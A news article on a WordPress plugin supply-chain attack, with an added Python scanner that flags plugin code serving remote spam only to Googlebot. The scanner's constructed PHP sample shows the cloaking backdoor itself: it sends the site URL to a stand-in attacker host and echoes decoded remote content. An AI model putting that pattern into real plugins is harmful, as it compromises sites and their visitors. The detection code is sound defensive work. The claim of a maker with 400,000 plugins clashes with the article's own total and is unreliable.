
Dozens of WordPress plugins have been compromised by an unknown actor who planted backdoors in popular add-ons after buying them for hundreds of thousands of dollars.
WordPress developer and founder of Anchor Hosting, Austin Ginder, identified a supply chain attack affecting the popular content management system’s plugins.
Essential Plugins, a plugin maker with over 400,000 plugins, was bought, and backdoors were soon added to popular WordPress plugins.
WordPress has over 62,000 free plugins, which are used by millions of people who host their blogs or online media on the content management system.
Ginder found that more than 30 plugins had been purchased by a person named “Kris,” who claimed a background in SEO, online gambling, and cryptocurrency.
The user bought these unidentified plugins for six figures via the private marketplace Flippa.
While all seemed quiet, these plugins were harboring a dark secret that would come to light eight months later.
The investigation began when WordPress announced that a plugin called “Countdown Timer Ultimate” contained malicious code that third parties could exploit.
The notice prompted Ginder to take a look at more of Essential Plugins’ WordPress add-ons.
Ginder found that many of these WordPress plugins had been injected with sophisticated code that fetched spam links, redirects, and fake pages from a command-and-control server.
The behavior of these compromised WordPress plugins was invisible to ordinary visitors and surfaced only when the page was requested by Googlebot.
This scheme was particularly sophisticated, as the bad actor’s domain was routed through an Ethereum smart contract.
The bad actor was able to inject plugins with malware that only Google would see, while the Ethereum smart contract made it difficult for authorities to block the domain.
“Traditional domain takedowns would not work because the attacker could update the smart contract to point to a new domain at any time,” Ginder explained.
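The cloaking described above has a recognisable shape in plugin source: a check on the visitor's user-agent for a search-engine crawler, sitting close to a remote fetch whose response is decoded or echoed into the page. The heuristic scanner below is an added example written for this article, not code from Ginder, WordPress, or Essential Plugins; it flags PHP where those indicators co-occur within a short window while leaving alone both ordinary remote API calls and the common, legitimate pattern of checking for Googlebot only to skip analytics. The three PHP snippets are constructed for the demonstration, the `placeholder.invalid` host stands in for an attacker-controlled domain, and the indicator list, window size and weights are assumptions to tune against a real plugin corpus.

```python
import re
from dataclasses import dataclass
from typing import List

# Lines of context on either side of a crawler-name check in which the other
# indicators are correlated with it (assumed value, tune per code base).
WINDOW = 12

# Indicator regexes. "ua_check" plus "crawler_name" is the gate that says the
# code branches on the visitor being a crawler; the weighted ones decide whether
# the window is worth reporting.
INDICATORS = {
    "ua_check": re.compile(r"HTTP_USER_AGENT", re.I),
    "crawler_name": re.compile(r"googlebot|bingbot|yandexbot|duckduckbot", re.I),
    "remote_fetch": re.compile(
        r"\b(?:wp_remote_(?:get|post|request)|file_get_contents|curl_exec|fsockopen)\s*\(", re.I),
    "decode_or_eval": re.compile(
        r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13|eval|create_function)\s*\(", re.I),
    "redirect": re.compile(r"\bwp_redirect\s*\(|\bheader\s*\(\s*['\"]Location", re.I),
    "raw_output": re.compile(r"\b(?:echo|print|printf)\b", re.I),
}
WEIGHTS = {"remote_fetch": 3, "decode_or_eval": 2, "redirect": 2, "raw_output": 1}


@dataclass(frozen=True)
class Finding:
    line: int          # 1-based line holding the crawler-name check
    indicators: tuple  # sorted indicator names seen in the window
    score: int         # sum of WEIGHTS for the weighted indicators present


def scan_php(source: str) -> List[Finding]:
    """Return one Finding per crawler check that co-occurs with a strong indicator."""
    lines = source.splitlines()
    findings: List[Finding] = []
    last_reported = -WINDOW - 1
    for i, line in enumerate(lines):
        if not INDICATORS["crawler_name"].search(line):
            continue
        if i - last_reported <= WINDOW:
            continue  # already covered by the previous finding's window
        lo, hi = max(0, i - WINDOW), min(len(lines), i + WINDOW + 1)
        window = "\n".join(lines[lo:hi])
        seen = {name for name, rx in INDICATORS.items() if rx.search(window)}
        if "ua_check" not in seen:
            continue  # a crawler name without a user-agent read is not a cloaking gate
        score = sum(WEIGHTS[n] for n in seen if n in WEIGHTS)
        if score < 2:
            continue  # output alone is routine; require a fetch, decode or redirect
        findings.append(Finding(i + 1, tuple(sorted(seen)), score))
        last_reported = i
    return findings


# Constructed sample 1: a legitimate remote call with no crawler branching.
BENIGN_FEED = """<?php
function ep_fetch_changelog() {
    $resp = wp_remote_get( 'https://example.com/changelog.json' );
    if ( is_wp_error( $resp ) ) { return array(); }
    return json_decode( wp_remote_retrieve_body( $resp ), true );
}
"""

# Constructed sample 2: a crawler check used only to skip analytics (common, benign).
BENIGN_BOT_SKIP = """<?php
function ep_should_load_analytics() {
    $ua = isset( $_SERVER['HTTP_USER_AGENT'] ) ? $_SERVER['HTTP_USER_AGENT'] : '';
    if ( stripos( $ua, 'Googlebot' ) !== false ) {
        return false; // do not count bot hits
    }
    return true;
}
"""

# Constructed sample 3: the cloaking shape the article describes. placeholder.invalid
# stands in for the attacker-controlled host.
CLOAKING_PATTERN = """<?php
function ep_footer_hook() {
    $ua = isset( $_SERVER['HTTP_USER_AGENT'] ) ? $_SERVER['HTTP_USER_AGENT'] : '';
    if ( stripos( $ua, 'Googlebot' ) === false ) {
        return; // ordinary visitors see nothing
    }
    $resp = wp_remote_get( 'https://placeholder.invalid/links?site=' . urlencode( home_url() ) );
    if ( ! is_wp_error( $resp ) ) {
        echo base64_decode( wp_remote_retrieve_body( $resp ) );
    }
}
"""

if __name__ == "__main__":
    for name, src in [("feed", BENIGN_FEED), ("bot_skip", BENIGN_BOT_SKIP),
                      ("cloaking", CLOAKING_PATTERN)]:
        print(name, scan_php(src))
```

Run against a plugin directory, the scanner is a triage aid rather than a verdict: a hit means the file branches on a crawler user-agent and, nearby, pulls or decodes remote content, which is exactly the combination a reviewer should read by hand. It says nothing about how the remote host is chosen, so a plugin that resolves its domain through a smart contract, as the article describes, would still be caught only by the fetch-and-echo shape, not by the resolution mechanism.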
Earlier this month, WordPress’s Plugins Team officially closed every plugin from the company Essential Plugins.
This included at least 30 plugins, which Ginder fully lists in his blog post.